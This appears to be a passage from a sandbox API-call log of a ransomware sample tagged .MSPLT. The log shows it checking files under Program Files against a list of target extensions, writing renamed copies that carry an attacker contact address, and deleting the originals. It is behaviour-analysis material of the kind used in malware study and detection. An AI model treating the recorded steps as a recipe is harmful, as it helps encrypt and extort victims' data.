lstrlenW (lpString=".dbf") returned 4 [0173.388] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.388] lstrlenW (lpString=".1cd") returned 4 [0173.388] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0173.388] lstrlenW (lpString=".jpg") returned 4 [0173.389] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.389] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.389] lstrlenW (lpString="auxbase.xml") returned 11 [0173.389] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.591] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=1434) returned 1 [0173.591] CloseHandle (hObject=0x348) returned 1 [0173.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0173.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.592] lstrlenW (lpString=".doc") returned 4 [0173.592] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString=".docx") returned 5 [0173.592] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.592] lstrlenW (lpString=".pdf") returned 4 [0173.592] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString=".xls") returned 4 [0173.592] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString=".xlsx") returned 5 [0173.592] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.592] lstrlenW (lpString=".ppt") returned 4 [0173.592] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.592] lstrlenW (lpString=".zip") returned 4 [0173.592] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.592] lstrlenW (lpString=".rar") returned 4 [0173.592] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString=".bz2") returned 4 [0173.592] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString=".7z") returned 3 [0173.592] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.592] lstrlenW (lpString=".dbf") returned 4 [0173.592] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.592] lstrlenW (lpString=".1cd") returned 4 [0173.592] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.592] lstrlenW (lpString=".jpg") returned 4 [0173.593] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.593] lstrlenW (lpString=".doc") returned 4 [0173.593] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString=".docx") returned 5 [0173.593] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.593] lstrlenW (lpString=".pdf") returned 4 [0173.593] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString=".xls") returned 4 [0173.593] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString=".xlsx") returned 5 [0173.593] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.593] lstrlenW (lpString=".ppt") returned 4 [0173.593] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.593] lstrlenW (lpString=".zip") returned 4 [0173.593] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.593] lstrlenW (lpString=".rar") returned 4 [0173.593] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString=".bz2") returned 4 [0173.593] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString=".7z") returned 3 [0173.593] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.593] lstrlenW (lpString=".dbf") returned 4 [0173.593] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.593] lstrlenW (lpString=".1cd") returned 4 [0173.593] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0173.593] lstrlenW (lpString=".jpg") returned 4 [0173.593] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.594] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.594] lstrlenW (lpString="insertbase.xml") returned 14 [0173.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0173.957] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=903) returned 1 [0173.957] CloseHandle (hObject=0x344) returned 1 [0173.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0x20 [0173.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.958] lstrlenW (lpString=".doc") returned 4 [0173.958] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.958] lstrlenW (lpString=".docx") returned 5 [0173.958] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.958] lstrlenW (lpString=".pdf") returned 4 [0173.958] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.958] lstrlenW (lpString=".xls") returned 4 [0173.958] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.958] lstrlenW (lpString=".xlsx") returned 5 [0173.958] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.958] lstrlenW (lpString=".ppt") returned 4 [0173.958] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.958] lstrlenW (lpString=".zip") returned 4 [0173.959] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.959] lstrlenW (lpString=".rar") returned 4 [0173.959] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.959] lstrlenW (lpString=".bz2") returned 4 [0173.959] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.959] lstrlenW (lpString=".7z") returned 3 [0173.959] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.959] lstrlenW (lpString=".dbf") returned 4 [0173.959] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.959] lstrlenW (lpString=".1cd") returned 4 [0173.959] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.959] lstrlenW (lpString=".jpg") returned 4 [0173.959] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.959] lstrlenW (lpString=".doc") returned 4 [0173.959] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString=".docx") returned 5 [0173.960] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.960] lstrlenW (lpString=".pdf") returned 4 [0173.960] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString=".xls") returned 4 [0173.960] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString=".xlsx") returned 5 [0173.960] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.960] lstrlenW (lpString=".ppt") returned 4 [0173.960] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.960] lstrlenW (lpString=".zip") returned 4 [0173.960] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.960] lstrlenW (lpString=".rar") returned 4 [0173.960] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString=".bz2") returned 4 [0173.960] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString=".7z") returned 3 [0173.960] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.960] lstrlenW (lpString=".dbf") returned 4 [0173.960] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.960] lstrlenW (lpString=".1cd") returned 4 [0173.960] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0173.961] lstrlenW (lpString=".jpg") returned 4 [0173.961] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.961] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.961] lstrlenW (lpString="kor-kor.xml") returned 11 [0173.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0174.073] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=392) returned 1 [0174.073] CloseHandle (hObject=0x358) returned 1 [0174.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0174.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0174.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0174.074] lstrlenW (lpString=".doc") returned 4 [0174.074] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.074] lstrlenW (lpString=".docx") returned 5 [0174.074] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0174.074] lstrlenW (lpString=".pdf") returned 4 [0174.074] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.074] lstrlenW (lpString=".xls") returned 4 [0174.074] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.074] lstrlenW (lpString=".xlsx") returned 5 [0174.074] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0174.074] lstrlenW (lpString=".ppt") returned 4 [0174.074] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0174.074] lstrlenW (lpString=".zip") returned 4 [0174.074] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.074] lstrlenW (lpString=".rar") returned 4 [0174.074] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.075] lstrlenW (lpString=".bz2") returned 4 [0174.075] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.075] lstrlenW (lpString=".7z") returned 3 [0174.075] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0174.075] lstrlenW (lpString=".dbf") returned 4 [0174.075] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.313] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.313] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.314] GetLastError () returned 0x0 [0174.314] ReadFile (in: hFile=0x374, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x285, lpOverlapped=0x0) returned 1 [0174.317] WriteFile (in: hFile=0x348, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x290, lpOverlapped=0x0) returned 1 [0174.319] ReadFile (in: hFile=0x374, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0174.319] WriteFile (in: hFile=0x348, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xea, lpOverlapped=0x0) returned 1 [0174.319] SetEndOfFile (hFile=0x348) returned 1 [0174.319] CloseHandle (hObject=0x348) returned 1 [0174.326] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.326] SetEndOfFile (hFile=0x374) returned 1 [0174.327] CloseHandle (hObject=0x374) returned 1 [0174.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x26) returned 1 [0174.328] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0174.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.328] lstrlenW (lpString=".doc") returned 4 [0174.328] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0174.328] lstrlenW (lpString=".docx") returned 5 [0174.329] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0174.329] lstrlenW (lpString=".pdf") returned 4 [0174.329] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0174.329] lstrlenW (lpString=".xls") returned 4 [0174.329] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0174.329] lstrlenW (lpString=".xlsx") returned 5 [0174.329] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0174.329] lstrlenW (lpString=".ppt") returned 4 [0174.329] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0174.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.329] lstrlenW (lpString=".zip") returned 4 [0174.329] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0174.329] lstrlenW (lpString=".rar") returned 4 [0174.329] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0174.329] lstrlenW (lpString=".bz2") returned 4 [0174.329] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0174.329] lstrlenW (lpString=".7z") returned 3 [0174.329] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0174.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.329] lstrlenW (lpString=".dbf") returned 4 [0174.329] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0174.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.329] lstrlenW (lpString=".1cd") returned 4 [0174.329] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0174.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.329] lstrlenW (lpString=".jpg") returned 4 [0174.329] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0174.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.329] lstrlenW (lpString=".doc") returned 4 [0174.329] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0174.329] lstrlenW (lpString=".docx") returned 5 [0174.329] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0174.330] lstrlenW (lpString=".pdf") returned 4 [0174.330] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0174.330] lstrlenW (lpString=".xls") returned 4 [0174.330] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0174.330] lstrlenW (lpString=".xlsx") returned 5 [0174.330] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0174.330] lstrlenW (lpString=".ppt") returned 4 [0174.330] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0174.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.330] lstrlenW (lpString=".zip") returned 4 [0174.330] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0174.330] lstrlenW (lpString=".rar") returned 4 [0174.330] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0174.330] lstrlenW (lpString=".bz2") returned 4 [0174.330] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0174.330] lstrlenW (lpString=".7z") returned 3 [0174.330] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0174.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.330] lstrlenW (lpString=".dbf") returned 4 [0174.330] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0174.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.330] lstrlenW (lpString=".1cd") returned 4 [0174.330] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0174.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0174.330] lstrlenW (lpString=".jpg") returned 4 [0174.330] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0174.330] lstrcmpiW (lpString1=".htm", lpString2=".MSPLT") returned -1 [0174.330] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0174.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.331] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=237) returned 1 [0174.331] CloseHandle (hObject=0x374) returned 1 [0174.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0174.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString=".doc") returned 4 [0174.332] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0174.332] lstrlenW (lpString=".docx") returned 5 [0174.332] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0174.332] lstrlenW (lpString=".pdf") returned 4 [0174.332] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0174.332] lstrlenW (lpString=".xls") returned 4 [0174.332] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0174.332] lstrlenW (lpString=".xlsx") returned 5 [0174.332] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0174.332] lstrlenW (lpString=".ppt") returned 4 [0174.332] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0174.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString=".zip") returned 4 [0174.332] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0174.332] lstrlenW (lpString=".rar") returned 4 [0174.332] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0174.332] lstrlenW (lpString=".bz2") returned 4 [0174.332] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0174.332] lstrlenW (lpString=".7z") returned 3 [0174.332] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0174.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString=".dbf") returned 4 [0174.332] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0174.332] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0174.332] lstrlenW (lpString=".1cd") returned 4 [0174.332] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0174.332] lstrlenW 